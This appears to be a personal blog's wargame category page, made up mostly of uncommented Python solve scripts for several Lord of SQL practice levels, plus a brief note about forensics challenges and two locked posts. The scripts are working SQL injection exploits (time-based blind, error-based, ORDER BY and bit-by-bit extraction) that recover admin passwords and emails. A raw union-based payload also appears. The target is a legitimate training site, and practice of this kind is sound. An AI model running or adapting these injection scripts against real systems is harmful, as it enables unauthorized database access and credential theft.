454 posts in 'Wargame'

LOS2 phantom

Wargame/Lord of SQL 2018. 10. 10. 09:50

import requests
import time

def request(payload):
    # Return the elapsed time; the payload calls sleep(1) when its condition holds
    start = time.time()
    url = "http://los.rubiya.kr/phantom_e2e30eaf1c0b3cb61b4b72a932c849fe.php"
    params = {'joinmail': payload}
    headers = {'Cookie': 'PHPSESSID=84u3mb02noqq3j7t40iv2roqc7'}
    requests.get(url, params=params, headers=headers)
    end = time.time()
    return end - start

# Find the length of the email stored at no=1
length = 0
for i in range(0, 100):
    payload = "1'),(if(length((select a.email from prob_phantom a where a.no=1))="+str(i)+",sleep(1),1),'5','1')-- x"
    if request(payload) > 1:
        length = i
        break

print("Find Admin Email Length[*] = " + str(length))

# Recover each character one bit at a time (8 requests per character)
admin_email = ""
for i in range(1, length + 1):
    binary = ""
    for j in range(1, 9):
        payload = "1'),(if(substring(lpad(bin(ord(substring((select a.email from prob_phantom a where a.no=1),"+str(i)+",1))),8,0),"+str(j)+",1)=1,sleep(1),1),'5','1')-- x"
        if request(payload) > 1:
            binary += "1"
        else:
            binary += "0"
    if binary != "00000000":
        admin_email += chr(int(binary, 2))

print("Find Admin Email[*] = " + str(admin_email))



JeonYoungSin

A space for keeping notes
# Lord of SQL frankenstein (challenge name taken from the URL below)
import requests

def request(payload):
    url = "http://los.rubiya.kr/frankenstein_b5bab23e64777e1756174ad33f14b5db.php"
    params = {'pw': payload}
    headers = {'Cookie': 'PHPSESSID=84u3mb02noqq3j7t40iv2roqc7'}
    response = requests.get(url, params=params, headers=headers)
    # True when the response contains "config.php"
    return "config.php" in response.text

strings = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
admin_pw = ""
for i in range(1, 100):
    for j in range(0, len(strings)):
        # When the LIKE prefix does not match, 9e300*9e300 overflows and the query errors
        payload = "' or id='admin' and case when pw like '"+admin_pw+strings[j]+"%' then 1 else 9e300*9e300 end-- x "
        if request(payload):
            admin_pw += strings[j]
            break
    # Stop once the inner loop has run through to the last candidate
    if j == len(strings) - 1:
        break
print("Find Admin Pw[*] = " + admin_pw)


# Lord of SQL blue_dragon (challenge name taken from the URL below)
import requests
import time

def request(payload):
    # Return the elapsed time; the payload calls sleep(3) when its condition holds
    start = time.time()
    url = "http://los.rubiya.kr/blue_dragon_23f2e3c81dca66e496c7de2d63b82984.php"
    params = {'id': payload}
    headers = {'Cookie': 'PHPSESSID=84u3mb02noqq3j7t40iv2roqc7'}
    requests.get(url, params=params, headers=headers)
    end = time.time()
    return end - start

# Find the length of the admin pw
length = 0
for i in range(0, 100):
    payload = "' or id='admin' and if(length(pw)="+str(i)+",sleep(3),1)-- x"
    if request(payload) > 2.8:
        length = i
        break

print("Find Admin Pw Length[*] = " + str(length))

# Recover each character by testing printable ASCII codes
admin_pw = ""
for i in range(1, length + 1):
    for j in range(32, 127):
        payload = "' or id='admin' and if(ascii(substring(pw,"+str(i)+",1))="+str(j)+",sleep(3),1)-- x"
        if request(payload) > 2.8:
            admin_pw += chr(j)
            break
print("Find Admin Pw[*] = " + admin_pw)



LOS2 red_dragon

Wargame/Lord of SQL 2018. 10. 10. 09:20

import requests

def request(payload_1, payload_2):
    url = "http://los.rubiya.kr/red_dragon_b787de2bfe6bc3454e2391c4e7bb5de8.php"
    params = {'id': payload_1, 'no': payload_2}
    headers = {'Cookie': 'PHPSESSID=fnlt2l775q0o8folhtjp84pqg5'}
    response = requests.get(url, params=params, headers=headers)
    # True when the page greets admin, i.e. the injected comparison held
    return "Hello admin" in response.text

payload_1 = "'||pw>#"
payload_2 = "\n0x"
for j in range(0, 100):
    for i in range(32, 128):
        # Append candidate byte i as two hex digits; the first failing comparison bounds the byte
        if not request(payload_1, payload_2 + hex(i).replace("0x", "")):
            payload_2 += hex(i - 1).replace("0x", "")
            break
    if i == 127:
        break

pw = hex(int(payload_2, 16) + 1)
# Python 3 hex() has no trailing "L", so only the "0x" prefix is stripped before decoding
print("Find Pw[*] = " + bytes.fromhex(pw[2:]).decode("latin-1").lower())



payload

id=\&pw= union select 0x5c,0x20756e696f6e2073656c6563742030783631363436643639366523#




# Lord of SQL evil_wizard (challenge name taken from the URL below)
import requests

def request(payload):
    url = "http://los.rubiya.kr/evil_wizard_32e3d35835aa4e039348712fb75169ad.php"
    params = {'order': payload}
    headers = {'Cookie': 'PHPSESSID=cjuc8f1iu5f7ooe4ktnrgdv565'}
    response = requests.get(url, params=params, headers=headers)
    # True when the admin row is the first row of the result table
    return "h>email</th><th>score</th><tr><td>admin</td" in response.text

# Find the length of the email in the row with score=50
length = 0
for i in range(0, 100):
    payload = "if(score=50 and length(email)="+str(i)+",score,999)"
    if request(payload):
        length = i

print("Find Admin Email Length[*] = " + str(length))

# Recover each character one bit at a time (8 requests per character)
admin_email = ""
for i in range(1, length + 1):
    binary = ""
    for j in range(1, 9):
        payload = "if(score=50 and substring(lpad(bin(ord(substring(email,"+str(i)+",1))),8,0),"+str(j)+",1)=1,score,999)"
        if request(payload):
            binary += "1"
        else:
            binary += "0"
    if binary != "00000000":
        admin_email += chr(int(binary, 2))

print("Find Admin Email[*] = " + str(admin_email))



LOS2 hell_fire

Wargame/Lord of SQL 2018. 10. 10. 09:00

import requests
import time

def request(payload):
    # Return the elapsed time; the payload calls sleep(1) when its condition holds
    start = time.time()
    url = "http://los.rubiya.kr/hell_fire_309d5f471fbdd4722d221835380bb805.php"
    params = {'order': payload}
    headers = {'Cookie': 'PHPSESSID=cjuc8f1iu5f7ooe4ktnrgdv565'}
    requests.get(url, params=params, headers=headers)
    end = time.time()
    return end - start

# Find the length of the email in the row with score=200
length = 0
for i in range(0, 40):
    payload = "if(score=200 and length(email)="+str(i)+",sleep(1),1)"
    if request(payload) > 1:
        length = i

print("Find Admin Email Length[*] = " + str(length))

# Recover each character by testing printable ASCII codes
admin_email = ""
for i in range(1, length + 1):
    for j in range(32, 127):
        payload = "if(score=200 and ascii(substring(email,"+str(i)+",1))="+str(j)+",sleep(1),1)"
        if request(payload) > 1:
            admin_email += chr(j)
            break
print("Find Admin Email[*] = " + str(admin_email))



20180925

Wargame/Suninatas 2018. 9. 25. 15:47

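Over the holiday I had some spare time, and my head was hurting from working on D-CTF challenges. Since I have recently become interested in forensics and MISC as well, I remembered a site where long ago I had only looked at the web part, so I went back to it after a long while. The challenges went better than I expected, and I lost track of time solving them. There are four forensics challenges left, roughly of the incident-response kind; it is my first time solving this type of challenge, so it seems like it will be fun.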


 



solveme.peng.kr Hell Js

2018. 7. 21. 16:11

This post is protected.
Enter the password to view its contents.

solveme.peng.kr I am slowly

2018. 7. 20. 21:26

This post is protected.
Enter the password to view its contents.